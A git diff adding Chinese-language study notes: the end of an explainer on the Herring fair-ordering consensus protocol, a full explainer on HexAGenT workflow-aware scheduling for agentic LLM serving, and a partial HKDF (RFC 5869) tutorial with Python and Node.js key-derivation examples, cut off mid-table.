+攻击方式很简单:恶意客户端故意只向部分验证者发送交易,使得公平性层永远无法收集到足够的证据来确定边的方向,导致排序永远卡住——系统**不宕机但也不前进**(liveness 被破坏)。 + +Herring 提出了补丁并集成到了 FairDAG 和 DoD 的复现代码中,让它们在评测中能够完整运行。 + +## 四、性能结果 + +Herring 建立在 Narwhal & Tusk(Rust 实现)之上,与 FairDAG-RL、DoD-W、Themis 对比: + +| 指标 | Herring | FairDAG-RL | DoD-W | +|------|---------|-----------|-------| +| 吞吐量 | ~10,000 tx/s | 基准 | 基准 | +| 饱和吞吐量提升 | — | +90% | +100% | +| 执行延迟降低 | — | 最高 75% | 最高 75% | +| 公平性瓶颈 | 无 | 公平性层 | DAG Pipeline | +| 活体攻击漏洞 | 无 | 有(已补丁) | 有(已补丁) | + +关键数字:**在 10,000 tx/s 下,Herring 的吞吐量几乎跟底层的 Narwhal & Tusk 持平**——说明公平性层的开销被压得非常低。 + +## 五、为什么叫 "Herring"? + +论文作者没有正式说明命名来源。但结合上下文可以推测:"Herring" 可能暗指"红鲱鱼(red herring)"——在分布式系统中,人们长期认为"高性能"和"顺序公平性"是不可兼得的红鲱鱼概念,而 Herring 证明了它们是兼容的。 + +## 六、总结:一句话理解 Herring + +> 之前的 DAG 公平性方案把公平性计算变成了串行的性能瓶颈;Herring 把这块计算**并行化**,让公平性从"拖慢共识的累赘"变成了"可以水平扩展的 CPU 密集型任务"。 + +### 关键设计决策回顾 + +1. **Post-consensus**:公平性计算放在共识之后,不阻塞关键路径 +2. **Parallel graph construction**:多个子 DAG 的图构建线程并行执行 +3. **Explicit missing edge resolution**:通过可靠广播显式补齐缺失边,避免线程互相等待 +4. **Self-referencing rule**:每个节点在 propose 新顶点时必须引用自己前一轮的证书,保证证据链不中断 + +### 下一步阅读建议 + +- Narwhal & Tusk 原始论文(理解底层 DAG 共识) +- Themis 论文(理解 batch unspooling 技术) +- Kelkar et al. 的 "Order-Fairness for Byzantine Consensus"(γ-batch-OF 的原始定义) diff --git a/src/content/docs/papers/hexagent-agentic-scheduling.md b/src/content/docs/papers/hexagent-agentic-scheduling.md new file mode 100644 index 000000000..4c54c7d68 --- /dev/null +++ b/src/content/docs/papers/hexagent-agentic-scheduling.md @@ -0,0 +1,426 @@ +--- +title: HexAGenT — 面向 Agentic LLM 的工作流与异构感知调度 +来源: 'You Peng et al., "HexAGenT: Efficient Agentic LLM Serving via Workflow- and Heterogeneity-Aware Scheduling", arXiv:2605.16637, 2026; https://arxiv.org/abs/2605.16637' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:外卖平台该按「单」排,还是按「整单送达」排? + +想象你经营一家连锁厨房,专门服务「会自己加菜的 AI 助手」——每个用户请求不是一次对话,而是一道**多步骤套餐**: + +1. **规划**:先让 LLM 想下一步做什么(plan)。 +2. **调工具**:查数据库、跑代码、调 API(tool use)。 +3. **分支**:并行查三个候选方案(tree search / LATS)。 +4. **汇总**:把中间结果合成最终回答(synthesis)。 + +顾客体验的是**整单送达时间**——从下单到最后一道菜上桌——而不是「某一道菜单独有多快」。更麻烦的是:**菜单是边做边揭晓的**。你只知道第一步要炒什么;等第一步出锅、工具返回结果后,才知道后面还要不要加菜、加几道。 + +传统 LLM 推理集群(vLLM、SGLang)像按**单道菜**排队的食堂:先来先服务(FCFS),哪台 GPU 空闲就扔过去。这在「一问一答」的聊天场景够用,但在 Agent 场景会出三类典型问题: + +| 类比 | Agent serving 现实 | +|------|---------------------| +| 把 A 顾客的第三道菜插到 B 顾客第一道菜前面 | 不同 workflow 的 LLM call 被 per-call FCFS 乱序穿插,拖慢关键路径 | +| 所有菜都在同一口大锅炒 | Prefill(算 prompt)和 Decode(逐 token 生成)混在同一 GPU,资源利用差 | +| 新厨师和老厨师混用,却按「谁空谁上」分配 | A100/H100/H200 混部集群里,没考虑各卡 prefill/decode 速度差异和 KV 搬运带宽 | + +**HexAGenT**(**Hex**erogeneous **A**gentic LLM Servin**G** with workflow-aware scheduli**T**)要回答的核心问题是:**在 Prefill–Decode(P-D)分离、GPU 异构的集群上,怎样调度「在线逐步展开的 Agent 工作流 DAG」,让整个 workflow 在 SLO 内完成,而不是只优化单次 LLM 调用的延迟?** + +论文作者来自 HKUST、Webank、武汉大学、清华等;实现基于 **SGLang v0.5.9** 的 P-D 分离 serving,并在 A100/H100/H200 混部集群上验证。 + +--- + +## 是什么 + +**HexAGenT** 是一个面向 **Agentic LLM 在线 serving** 的全局调度器,部署在 P-D 分离架构的 gateway/router 层,核心能力包括: + +1. **在线 DAG 抽象**:每个用户请求是一个**运行时逐步揭示**的有向无环图(DAG),节点是 LLM call,边是依赖(父 call 完成或 tool 返回后才 reveal 子 call)。 +2. **Workflow horizon**:为每个 workflow 维护「若当前已揭示子图独占集群跑完需要多久」的估计 \(H_w(t)\),作为**端到端 SLO 锚点**。 +3. **Projected-risk 优先级**:就绪 call 按「预计违反 horizon 的风险」排序,而非单纯 FCFS 或最短 job 优先。 +4. **联合 Prefill–Decode 放置**:同时为每个 call 选 prefill 实例、decode 实例、本地队列优先级,并考虑 KV 容量与跨阶段传输延迟。 +5. **异构感知**:不同 GPU 类型的 prefill 速度、decode 速度、跨卡 KV 传输带宽都进入估计模型。 + +一句话:**HexAGenT 把 Agent serving 从「调度独立 LLM 请求」升级为「调度在线展开的工作流,并在异构 P-D 集群上做联合放置与排队」。** + +--- + +## 为什么重要 + +### 1. 用户感知单位变了:workflow,不是 call + +ReAct、LATS、BFCL 等 Agent 范式下,一次用户请求常展开为**多步、有依赖、可分支**的 LLM 调用链。用户等的是「任务完成」,调度器若只优化单次 call 延迟,可能在关键路径上饿死整个 workflow。 + +### 2. P-D 分离 + 异构集群是经济现实 + +- **Prefill** 吃算力(一次性处理长 prompt)。 +- **Decode** 吃显存与 KV cache(逐 token 生成)。 +- 生产集群常混用 A100/H100/H200 以复用存量并控制成本。 + +DistServe、Splitwise 解决了「阶段分离」,但没解决「在线 Agent DAG + 异构放置 + workflow SLO」的组合问题。 + +### 3. 现有系统的缺口 + +| 系统类型 | 代表 | 缺什么 | +|---------|------|--------| +| 请求级 serving | vLLM, SGLang, ORCA | 无 workflow 级 SLO 目标 | +| P-D 分离 | DistServe, Splitwise | 无在线 DAG、异构 workflow 调度 | +| Program-aware | Parrot, Hermes, Autellix, Continuum | 未同时处理在线 reveal + 异构 P-D + decode 容量约束 | + +论文 characterization 实验表明:仅把 per-call FCFS 换成 workflow-level FCFS,Req95 平均降 **31.4%**;再加上 HexAGenT 的异构放置,Req95 再降 **26.9%**(相对 Workflow-FCFS)。 + +--- + +## 核心概念 + +### 1. 在线揭示的工作流 DAG + +工作流 \(G_w = (V, E)\): + +- **节点** \(v \in V\):一次 LLM call(带 input length、预估 output length、workflow id)。 +- **边** \((u, v) \in E\):\(v\) 必须等 \(u\)(及可能的外部 tool)完成后才可调度。 + +**关键性质**:到达时只有**源节点**可见;父节点完成 → 子节点进入 **runnable frontier**(就绪前沿)。调度器永远在对「当前已揭示子图」做决策,而非静态 DAG。 + +```python +from dataclasses import dataclass, field +from typing import Dict, List, Set +import time + +@dataclass +class LLMCall: + call_id: str + workflow_id: str + prompt_tokens: int + parents: List[str] = field(default_factory=list) + children: List[str] = field(default_factory=list) + status: str = "pending" # pending | prefill | decode | done + +class OnlineWorkflowDAG: + """Agent 工作流:子节点随父节点完成而在线 reveal。""" + + def __init__(self, workflow_id: str, source_calls: List[LLMCall]): + self.workflow_id = workflow_id + self.arrival_time = time.time() + self.calls: Dict[str, LLMCall] = {c.call_id: c for c in source_calls} + self.done: Set[str] = set() + + def runnable_calls(self) -> List[LLMCall]: + """就绪前沿:所有 parent 已完成、自身未开始的 call。""" + ready = [] + for c in self.calls.values(): + if c.status != "pending": + continue + if all(p in self.done for p in c.parents): + ready.append(c) + return ready + + def on_call_complete(self, call_id: str, revealed_children: List[LLMCall]): + self.done.add(call_id) + self.calls[call_id].status = "done" + for child in revealed_children: + self.calls[child.call_id] = child # 在线 reveal 新节点 +``` + +### 2. Standalone horizon \(H_w(t)\) + +\(H_w(t)\) = 在**同一 P-D 集群**上,若 workflow \(w\) 在时刻 \(t\) 已揭示的子图 \(G_w(t)\) **独占运行**所需的完成时间(makespan)。 + +- 工作流刚到达时,只知道第一步 → \(H_w(t)\) 较小。 +- 新 call reveal 或 tool 返回 → 子图变大 → \(H_w(t)\) **动态上调**。 +- 真实服务时间观测到后,可用实测值修正估计。 + +这是 HexAGenT 的「deadline 代理」:优化目标不是绝对秒数,而是 **scaled-SLO**——完成时间 \(C_w\) 是否 ≤ \(\alpha \cdot H_w\)。 + +### 3. Scaled-SLO 与 Req95 / Req99 + +对每个 workflow \(w\),若 \(C_w \leq \alpha H_w\) 则视为满足 SLO。 + +- **Req95**:使 ≥95% workflow 达标的**最小** \(\alpha\)。 +- **Req99**:使 ≥99% workflow 达标的**最小** \(\alpha\)。 + +\(\alpha\) 越小说明调度越「紧」——同样硬件下更容易按时完成整条 Agent 链。HexAGenT 在异构集群上相对最强基线,Req95 平均降 **20.1%**,Req99 平均降 **33.0%**(最大分别 **45.0%** / **80.5%**)。 + +### 4. Projected ratio(投影风险比) + +对就绪 call \(c\)(属于 workflow \(w\)),在阶段 \(s \in \{\mathrm{Prefill}, \mathrm{Decode}\}\): + +\[ +R_s(c, t) = \frac{(t - a_w) + \Delta_s(c, t)}{H_w(t)} +\] + +- \(a_w\):workflow 到达时间。 +- \((t - a_w)\):已流逝时间。 +- \(\Delta_s(c, t)\):从**现在**起,若把 \(c\) 放到当前最优候选实例,预计在该阶段完成所需时间(含排队、prefill/decode 执行、KV 传输)。 + +**\(R_s\) 越大 → 越 urgent**(workflow 越接近或已超过 horizon)。HexAGenT 在 prefill/decode 两个阶段都用该信号排序。 + +### 5. Prefill–Decode 联合规划 + +P-D 分离下,一次 LLM call 的生命周期: + +``` +等待 prefill → Prefill 执行 → KV 传输 → 等待 decode 容量 → Decode 执行 → 完成 → reveal 子 call +``` + +HexAGenT 在 **prefill 调度阶段**就选定 decode instance(bootstrap),以便 prefill 完成后 KV 知道往哪搬。异构集群里,跨 GPU 代际的 KV 传输带宽更低,联合规划会惩罚「快 prefill + 慢传输 + 慢 decode」的组合。 + +### 6. Decode KV 容量约束 + +Decode 实例 \(d\) 有 KV cache 上限 \(\mathrm{Cap}(d)\)。call \(c\) 的内存需求近似: + +\[ +m(c) = L_{\mathrm{in}}(c) + \widehat{L}_{\mathrm{out}}(c) +\] + +仅当 \(m(c) \leq \mathrm{Cap}(d)\) 时可准入。Output length 用 proxy 模型预测(类似 SSJF 思路)。 + +--- + +## 系统架构(四组件) + +``` +用户 Agent 请求 + ↓ +┌─────────────────┐ +│ Workflow Front-end │ 维护在线 DAG、runnable frontier、horizon 更新 +└────────┬────────┘ + ↓ 就绪 call +┌─────────────────┐ +│ Global Scheduler │ State Collector → Estimator → Joint Planner → Plan Dispatcher +└────────┬────────┘ + ↓ 放置 + 优先级 +┌──────────────────────────────────────┐ +│ P-D Serving Cluster │ +│ Prefill Pool (A100/H100/H200...) │ +│ Decode Pool (A100/H100/H200...) │ +└────────┬─────────────────────────────┘ + ↓ + External Tools / LLM APIs +``` + +**Scheduler 内部四模块**: + +| 模块 | 职责 | +|------|------| +| **State Collector** | 收集 prefill/decode 队列、运行中 call、KV 使用率、传输状态、workflow 进度 | +| **Estimator** | Roofline 风格估计 prefill/decode/传输延迟与 decode 内存需求 | +| **Joint Planner** | 算 projected ratio,贪心选 prefill–decode 对与队列优先级 | +| **Plan Dispatcher** | 异步下发计划;已开始服务的 call 不再迁移 | + +**事件驱动重调度触发点**:workflow 到达、decode 完成 reveal 新 prefill 工作、KV 传输完成进入 decode 等待。 + +--- + +## 调度算法直觉与代码示例 + +### 示例 1:计算 projected ratio 并选最 urgent call + +下面是对论文公式 (2) 的简化 Python 示意(教学用,非论文源码): + +```python +from dataclasses import dataclass +from typing import List, Tuple + +@dataclass +class PlacementCandidate: + prefill_id: str + decode_id: str + projected_finish: float # 从 now 到 decode 完成的预计时间 + +def projected_ratio( + now: float, + arrival: float, + horizon: float, + delta: float, +) -> float: + """R_s(c,t) = ((t - a_w) + Δ_s(c,t)) / H_w(t)""" + if horizon <= 0: + return float("inf") + elapsed = now - arrival + return (elapsed + delta) / horizon + +def pick_most_urgent_prefill_call( + ready_calls: List[dict], + horizons: dict, + arrivals: dict, + enumerate_placements, + now: float, +) -> Tuple[dict, PlacementCandidate]: + """在 prefill 阶段:枚举 (prefill, decode) 对,取 R_P 最大的 call。""" + best_call, best_place, best_score = None, None, -1.0 + + for call in ready_calls: + wid = call["workflow_id"] + H = horizons[wid] + candidates = enumerate_placements(call) # 返回 List[PlacementCandidate] + best_for_call = min(candidates, key=lambda p: p.projected_finish) + score = projected_ratio( + now, arrivals[wid], H, best_for_call.projected_finish + ) + if score > best_score: + best_score = score + best_call = call + best_place = best_for_call + + return best_call, best_place +``` + +**解读**:不是「谁先到谁先 prefill」,而是「谁会让 workflow 最接近超标」谁先上;且 \(\Delta\) 里已经嵌入了**在异构实例上的预计完成时间**。 + +### 示例 2:事件驱动调度主循环(Algorithm 1 简化) + +```python +def hexagent_event_loop(event, t, state, planner_in_flight): + """ + event ∈ {workflow_arrival, prefill_done, transfer_done, decode_done} + 论文:prefill/decode 调度在 arrival、新 reveal、transfer 完成时触发。 + """ + update_queues_and_kv(state, event) + update_horizons(state, event) # H_w(t) 随 reveal 重算 + + triggered_stages = stages_to_schedule(event) # subset of {PREFILL, DECODE} + + for stage in triggered_stages: + if planner_in_flight[stage]: + apply_fallback_if_needed(state, stage) + continue + + waiting = state.waiting_calls(stage) + sim_state = state.snapshot() + plan = [] + + while waiting: + scores = [] + for call in waiting: + placement, delta = project_best_feasible(sim_state, call, stage) + R = projected_ratio( + t, + state.arrival[call.workflow_id], + state.horizon[call.workflow_id], + delta, + ) + scores.append((R, call, placement)) + + call_star = max(scores, key=lambda x: x[0]) + plan.append(call_star) + sim_state.apply(call_star[1]) # 更新模拟队列与 KV 占用 + waiting.remove(call_star[1]) + + dispatch_async(plan, stage) # 只更新仍在等待的 call +``` + +**贪心 + 模拟状态**:每选一个 call 就更新模拟集群状态,再重算剩余 call 的 urgency——避免「局部最优 prefill 实例」导致 decode 端拥塞。 + +### Prefill vs Decode 调度差异 + +| 阶段 | 优化目标 | 额外约束 | +|------|----------|----------| +| **Prefill** | 最小化 projected decode finish | 联合选 decode;考虑 KV 传输带宽 | +| **Decode** | 同样用 \(R_D\) | KV 容量 feasibility;locked vs free placement | + +- **Locked call**:prefill 阶段已绑定 decode instance,只能在该实例内重排。 +- **Free call**:可在任意可行 decode 实例间选择。 + +队列较小时用**重算贪心**;队列大时用**一次排序**控制调度开销。 + +--- + +## 实验设置与主要结果 + +### workload + +| Trace | 特点 | 规模示例 | +|-------|------|----------| +| **ShareGPT** | 顺序对话链 | 100 workflows @ 10/s | +| **BFCL-v3** | 工具调用、频繁 reveal | 400 @ 40/s | +| **LATS** | 树搜索、burst fan-out | 100 @ 40/s | +| **Mixed** | 三者混合 | 100 @ 10/s | + +模型:**Llama3.1-70B**、**Qwen3-235B-A22B**。 + +集群:**Hetero-1** = 8P+8D(每池 2×A100 + 3×H100 + 3×H200);**Hetero-2** = 10P+10D(3/4/3 配比)。 + +### 基线 + +- **SGLang-FCFS**:workflow 级 FCFS + 负载均衡 dispatch。 +- **SGLang-LLF**:workflow 级 least-laxity-first。 +- **Autellix-ATLAS**:program-aware attained-service 策略适配。 + +### Characterization 表(Req95 / Req99,越小越好) + +| Model | Trace | Per-call FCFS | Workflow-FCFS | HexAGenT | +|-------|-------|---------------|---------------|----------| +| Llama | ShareGPT | 5.85 / 7.43 | 4.50 / 6.22 | **2.50 / 2.60** | +| Llama | BFCL-v3 | 13.81 / 17.23 | 7.23 / 9.80 | **6.21 / 6.34** | +| Qwen | BFCL-v3 | 21.11 / 26.89 | 9.64 / 11.67 | **8.39 / 8.57** | +| Qwen | Mixed | 11.15 / 15.84 | 10.30 / 15.01 | **3.48 / 3.94** | + +**Mixed + Qwen** 上 HexAGenT 相对 Workflow-FCFS 的 Req95 从 10.30 降到 3.48——说明**仅靠 workflow 排序不够,异构放置是第二杠杆**。 + +### headline 汇总 + +相对最强基线,HexAGenT 使达标所需 SLO 缩放因子 \(\alpha\): + +- **95% 达标**:平均降 **20.1%**(最大 **45.0%**) +- **99% 达标**:平均降 **33.0%**(最大 **80.5%**) + +尾延迟(Req99)收益更大:workflow 级调度对「慢 Agent 链」更敏感。 + +--- + +## 实现要点 + +- **底座**:SGLang v0.5.9 P-D disaggregated serving。 +- **调度器位置**:Python gateway/router,**不在 GPU hot path**。 +- **模拟器**:~4.6K 行 Python,建模完整 call 生命周期与异步调度,用于估计 \(H_w\) 与 \(\Delta_s\)。 +- **异步规划**:求解进行中 serving 不阻塞;未分配 call 可采纳新计划,已开跑则状态以 runtime 为准。 + +--- + +## 与相关工作的关系 + +```text + 单请求 serving P-D 分离 Program-aware + │ │ │ + vLLM/SGLang DistServe/Splitwise Parrot/Hermes/Autellix + │ │ │ + └──────────────────────┴────────────────────────┘ + │ + HexAGenT 填补的交集: + 在线 DAG + 异构 P-D + workflow SLO + decode 容量 +``` + +- **Call-level SJF / slack / LTR**:改善单请求,**看不见 DAG 关键路径**。 +- **HexGen / SkyServe**:异构 LLM serving,但**非 Agent workflow 调度**。 +- **Hermes / Continuum**:向 program 级调度迈进,论文认为尚未同时处理在线 reveal + 异构 joint placement + decode KV 约束。 + +--- + +## 局限与开放问题 + +1. **Horizon 估计误差**:\(H_w(t)\) 依赖 reveal 后子图与 latency 模型;极端 tool 延迟或 output 长度预测偏差会削弱 projected ratio 的有效性(论文 Q3 讨论鲁棒性)。 +2. **调度开销 vs 质量**:异步规划若过慢,更多 call 在 fallback 策略下运行。 +3. **Scope**:聚焦 P-D 分离集群上的**调度策略**;不包含 Agent 逻辑本身(planning 算法、tool 选择)的优化。 +4. **迁移成本**:call 一旦开始 prefill/decode 即固定实例——动态抢占不在设计目标内。 + +--- + +## 给零基础读者的 takeaway + +1. **Agent serving 的基本单位是 workflow**,调度目标应是端到端 SLO,不是单次 LLM 延迟。 +2. **DAG 是在线长出来的**,调度器必须在「部分信息」下持续更新 horizon 与优先级。 +3. **P-D 分离把一个问题拆成两个队列 + 一次 KV 搬运**,必须 prefill/decode **联合**考虑。 +4. **异构 GPU 不是噪声,是调度信号**——同一 call 在不同实例上的完成时间不同,选错会拖垮整条 Agent 链。 +5. **Projected ratio** 是直观抓手:「这条 workflow 再不快就要超标了」→ 优先服务能最快把它拉回 horizon 内的 call + 放置组合。 + +--- + +## 延伸阅读 + +- **P-D 分离**:DistServe (Zhong et al.), Splitwise (Patel et al.) +- **Agent 工作负载**:ReAct, LATS, BFCL-v3 +- **Program-aware serving**:Parrot, Hermes, Autellix, Continuum +- **异构 LLM serving**:HexGen, ThunderServe, SkyServe +- **论文全文**:https://arxiv.org/abs/2605.16637 diff --git a/src/content/docs/papers/hkdf-rfc5869.md b/src/content/docs/papers/hkdf-rfc5869.md new file mode 100644 index 000000000..f7ec63e25 --- /dev/null +++ b/src/content/docs/papers/hkdf-rfc5869.md @@ -0,0 +1,283 @@ +--- +title: HKDF (RFC 5869) — 从「不太均匀的原料」榨出多把互不串味的密钥 +来源: https://www.rfc-editor.org/rfc/rfc5869 +日期: 2026-06-13 +分类: 安全与隐私 +子分类: 安全与隐私 +难度: 中级 +provenance: pipeline-v3 +--- + +## 是什么 + +**HKDF**(HMAC-based Extract-and-Expand Key Derivation Function)是 IETF **RFC 5869**(2010 年 5 月,Hugo Krawczyk & Pasi Eronen)定义的一套**密钥派生函数(KDF)**。它用 HMAC 把「初始密钥材料」变成一把或多把**密码学上可用的秘密密钥**,是 TLS 1.3、Noise、Signal、IKEv2、Web Crypto 等系统的常见积木。 + +日常类比: + +> 你有一桶**成分不太均匀的果汁**(Diffie-Hellman 共享值、熵池采样、协议协商结果——熵可能分散、格式也不均匀)。 +> - **Extract(提取)** = 用滤网 + 离心机把果汁**浓缩**成一小杯标准浓度的「基底液」**PRK**(pseudorandom key)。 +> - **Expand(扩展)** = 用同一杯基底,按不同**口味标签**(`info`)倒出多杯饮料:一杯给 AES 加密、一杯给 MAC、一杯给 IV——**杯子可以很多,但彼此味道独立**,不会串味。 +> +> 若你手里本来就是一瓶**出厂即合格的纯果汁**(已是均匀随机的 256 位密钥),可以跳过 Extract,只做 Expand——但 DH 共享值 `g^{xy}` **绝不是**这种合格果汁,Extract 不能省。 + +HKDF 的设计哲学是 **extract-then-expand**:先「浓缩熵」,再「按需拉长并域分离」。这比早期「直接把 DH 结果当 HMAC 密钥」或「单一 PRF 链式扩展」更保守、更好分析。 + +## 为什么重要 + +不理解 HKDF,现代协议里的密钥调度全是黑盒: + +- **TLS 1.3** 用 HKDF-Extract / HKDF-Expand 从 ECDHE 共享秘密逐级派生 Early / Handshake / Application traffic keys(见 [[tls-1-3-rfc8446]]) +- **Noise** 握手里每次 `MixKey` 本质上是 HKDF 风格链式派生(见 [[noise-protocol-framework]]) +- **Signal Double Ratchet** 的 `KDF_CK` / `KDF_RK` 推荐 HMAC / HKDF(见 [[signal-double-ratchet-2016]]) +- **WireGuard** 用 HKDF-BLAKE2s 从链密钥派生会话密钥(见 [[wireguard-2017]]) +- 浏览器 **Web Crypto API**、Node.js `crypto.hkdf`、Go `crypto/hkdf`、Rust `ring` 都内置 HKDF + +一句话:**HKDF 是「从共享秘密到多把专用密钥」的标准配方**;用错(跳过 Extract、复用 `info`、把密码当 IKM)会导致真实漏洞或审计红灯。 + +## 核心概念 + +### 1. 两阶段总览 + +```text +IKM (Input Keying Material) salt (可选,非秘密) + \ / + \ / + v v + +-----------------------------+ + | HKDF-Extract | + | PRK = HMAC-Hash(salt, IKM)| + +-----------------------------+ + | + | PRK (固定 HashLen 字节) + v + +-----------------------------+ + | HKDF-Expand | + | OKM = Expand(PRK, info, L) | + +-----------------------------+ + | + v + OKM (L 字节,可切成多把 key) +``` + +完整调用常写作: + +```text +HKDF(Hash, salt, IKM, info, L) = HKDF-Expand(PRK, info, L) + where PRK = HKDF-Extract(salt, IKM) +``` + +### 2. Extract:浓缩熵 + +| 项目 | 说明 | +|------|------| +| 输入 `IKM` | 初始密钥材料——DH 共享值、PSK、熵池输出等 | +| 输入 `salt` | **可选**、**不必保密**的随机串;缺省时 RFC 规定为 `HashLen` 个 `0x00` | +| 输出 `PRK` | 长度 = `HashLen`(如 SHA-256 → 32 字节)的伪随机密钥 | +| 公式 | `PRK = HMAC-Hash(salt, IKM)` | + +注意 HMAC 参数顺序:**salt 是 HMAC 的 key,IKM 是 message**(与直觉相反,但规范如此)。 + +Extract 解决的是:IKM 可能**熵不均匀**、攻击者**部分知道**其内容(例如 DH 值的低位结构)。Extract 把分散熵「压」进固定长度 PRK,使后续 Expand 建立在 PRF 假设上。 + +### 3. Expand:拉长 + 域分离 + +| 项目 | 说明 | +|------|------| +| 输入 `PRK` | 通常来自 Extract;长度 ≥ `HashLen` | +| 输入 `info` | **可选**上下文绑定串——协议号、算法 ID、方向标签等;可为空 | +| 输入 `L` | 想要的输出字节数,**≤ 255 × HashLen** | +| 输出 `OKM` | `L` 字节的输出密钥材料 | + +Expand 用**反馈链**生成足够长的伪随机流: + +```text +N = ceil(L / HashLen) +T(0) = empty +T(1) = HMAC-Hash(PRK, T(0) | info | 0x01) +T(2) = HMAC-Hash(PRK, T(1) | info | 0x02) +T(3) = HMAC-Hash(PRK, T(2) | info | 0x03) +... +OKM = first L bytes of (T(1) | T(2) | ... | T(N)) +``` + +末尾单字节计数器 `0x01, 0x02, …` 保证每轮 HMAC 输入不同。`info` 把 OKM **绑定到用途**:同一 IKM 派生「客户端写密钥」和「服务器写密钥」时,必须用不同的 `info`,否则两把 key 相关,灾难。 + +### 4. 参数选用指南(RFC Section 3 精华) + +| 参数 | 建议 | +|------|------| +| **salt** | 有就用。不必保密,但应**独立于 IKM** 且攻击者不能操控(IKE 里常从已认证 nonce 来) | +| **info** | 强烈建议非空:含协议版本、密钥用途、长度 `L` 等,防跨上下文密钥复用 | +| **跳过 Extract** | 仅当 IKM **已是**高质量均匀随机密钥;**DH 共享值绝不能跳过** | +| **Hash** | SHA-256 是默认常识;TLS 1.3 按 cipher suite 用 SHA-256 或 SHA-384 | + +### 5. HKDF 做不到的事 + +- **不能放大熵**:弱密码、低熵用户输入 → 应使用 **PBKDF2 / scrypt / Argon2**(RFC 5869 Section 5 明确说 HKDF 不适合单独做密码 KDF) +- **不是加密**:只派生密钥,不保密传输数据 +- **不替代随机数生成器**:PRNG 可以**用** HKDF 整理熵池,但 IKM 本身要有足够熵 + +### 6. 与 NIST SP 800-108 的区别(直觉) + +NIST 的 HMAC-DRBG / SP 800-108 类 KDF 常假设输入**已是**均匀随机 PRK。HKDF 的 Extract 阶段专门处理「IKM 不够好」的现实场景(DH、熵混合)。NIST SP 800-56C 也采纳了 extract-then-expand,并引用 Krawczyk 的 HKDF 论文作为设计依据。 + +## 在 TLS 1.3 里怎么用(简化) + +TLS 1.3 密钥调度是典型的「多级 Extract + 带标签 Expand」: + +```text +early_secret = HKDF-Extract(0, PSK_or_0) +handshake_secret = HKDF-Extract(Derive-Secret(early_secret, "derived"), shared_secret) +master_secret = HKDF-Extract(Derive-Secret(handshake_secret, "derived"), 0) + +client_hs_traffic = HKDF-Expand-Label(handshake_secret, "c hs traffic", transcript_hash, L) +server_hs_traffic = HKDF-Expand-Label(handshake_secret, "s hs traffic", transcript_hash, L) +client_ap_traffic = HKDF-Expand-Label(master_secret, "c ap traffic", transcript_hash, L) +server_ap_traffic = HKDF-Expand-Label(master_secret, "s ap traffic", transcript_hash, L) +``` + +`Expand-Label` 是 TLS 对 HKDF-Expand 的包装:把 `info` 结构化成 `tls13 ` + label + Hash(context)。这样 **handshake 密钥**和 **application 密钥**即使来自同一握手 transcript,也**计算独立**。 + +## 代码示例 1:Python — 对照 RFC 5869 附录测试向量 + +RFC 附录 **Test Case 1**(SHA-256)是验证实现是否正确的金标准: + +```python +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.kdf.hkdf import HKDFExpand, HKDFExtract + +# RFC 5869 Appendix A.1 +ikm = bytes.fromhex("0b" * 11 + "0b0b0b0b0b0b0b0b0b0b0b") # 22 bytes +salt = bytes.fromhex("000102030405060708090a0b0c") +info = bytes.fromhex("f0f1f2f3f4f5f6f7f8f9") +L = 42 + +hash_alg = hashes.SHA256() +prk = HKDFExtract(algorithm=hash_alg, salt=salt).derive(ikm) +okm = HKDFExpand(algorithm=hash_alg, length=L, info=info).derive(prk) + +expected_prk = bytes.fromhex( + "077709362c2e32df0ddc3f0dc47bba6390b6c73bb50f9c3122ec844ad7c2b3e5" +) +expected_okm = bytes.fromhex( + "3cb25f25faacd57a90434f64d0362f2a2d2d0a90cf1a5a4c5db02d56ecc4c5bf" + "34007208d5b887185865" +) + +assert prk == expected_prk, "Extract failed" +assert okm == expected_okm, "Expand failed" +print("RFC 5869 Test Case 1: OK") +``` + +一次性 `HKDF()` 封装(Extract + Expand 合体): + +```python +from cryptography.hazmat.primitives.kdf.hkdf import HKDF + +okm2 = HKDF( + algorithm=hashes.SHA256(), + length=L, + salt=salt, + info=info, +).derive(ikm) +assert okm2 == expected_okm +``` + +跑通 Test Case 1–3(SHA-256)是写密码库时的常规自检。 + +## 代码示例 2:Node.js — 从 DH 共享秘密派生 AES 密钥与 HMAC 密钥 + +应用层常见模式:一次 ECDH,用不同 `info` 切出加密钥和 MAC 钥(**教学示例,生产请用成熟协议如 TLS / Noise**): + +```javascript +import { hkdf, randomBytes, createDiffieHellman } from "node:crypto"; +import { promisify } from "node:util"; + +const hkdfAsync = promisify(hkdf); + +// 模拟双方 X25519 式 DH(此处用有限域 DH 演示 API) +const alice = createDiffieHellman(2048); +const bob = createDiffieHellman(alice.getPrime(), alice.getGenerator()); +alice.generateKeys(); +bob.generateKeys(); + +const sharedAlice = alice.computeSecret(bob.getPublicKey()); +const sharedBob = bob.computeSecret(alice.getPublicKey()); +if (!sharedAlice.equals(sharedBob)) throw new Error("DH mismatch"); + +// salt:应来自握手 transcript 或随机;此处演示用随机 32 字节 +const salt = randomBytes(32); +const ikm = sharedAlice; // DH 输出 —— 必须经过 Extract + +const encKey = await hkdfAsync("sha256", ikm, salt, "app-v1|aes-256-gcm", 32); +const macKey = await hkdfAsync("sha256", ikm, salt, "app-v1|hmac-sha256", 32); + +console.log("enc:", encKey.toString("hex").slice(0, 16) + "…"); +console.log("mac:", macKey.toString("hex").slice(0, 16) + "…"); +// enc !== mac:info 域分离生效 +``` + +`node:crypto.hkdf` 签名:`hkdf(digest, ikm, salt, info, keylen, callback)`,内部完成 Extract + Expand。浏览器侧等价 API 是 `crypto.subtle.deriveBits({ name: "HKDF", hash: "SHA-256", salt, info }, key, length)`。 + +## 代码示例 3:手动 Expand 循环(读懂 RFC 公式) + +下面 20 行展示 Expand 的「计数器链」本质,便于调试「为什么 L > HashLen 要多次 HMAC」: + +```python +import hmac +import hashlib + +def hkdf_expand_manual(prk: bytes, info: bytes, length: int) -> bytes: + hash_len = hashlib.sha256().digest_size + n = (length + hash_len - 1) // hash_len + t = b"" + okm = b"" + for i in range(1, n + 1): + t = hmac.new(prk, t + info + bytes([i]), hashlib.sha256).digest() + okm += t + return okm[:length] + +# 与 cryptography 库结果应一致 +``` + +当 `L = 82`、`HashLen = 32` 时,`N = ceil(82/32) = 3`,需要三轮 HMAC 才够长。 + +## 常见误区 + +| 误区 | 后果 | 正确做法 | +|------|------|----------| +| 把 DH 共享值直接当 AES 密钥 | 密钥空间不均匀,分析面变大 | 始终 